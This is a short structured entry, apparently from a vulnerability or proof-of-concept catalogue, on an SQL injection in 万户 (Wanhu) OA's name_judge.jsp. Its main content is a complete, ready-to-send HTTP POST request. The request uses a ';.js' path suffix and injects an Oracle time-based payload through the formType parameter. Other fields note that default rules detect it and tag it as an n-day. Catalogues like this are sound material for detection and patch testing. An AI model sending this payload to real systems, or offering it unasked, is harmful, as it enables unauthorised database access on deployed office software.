vendor = "万户"
name = "万户OA name_judge.jsp SQL注入"
type = "SQL注入"
version = "未知"
path = "/defaultroot/modules/govoffice/custom_documentmanager/name_judge.jsp"
detail = "POST /defaultroot/modules/govoffice/custom_documentmanager/name_judge.jsp;.js HTTP/1.1 Host: xx Content-Type: application/x-www-form-urlencoded Content-Length: xx formType=1+AND+1337=DBMS_PIPE.RECEIVE_MESSAGE('any',4)--&govFormName=1&formId=1"
fix = "缺省规则可检出"
date = "0730"
label = "nday"
verifier = "AdySec"
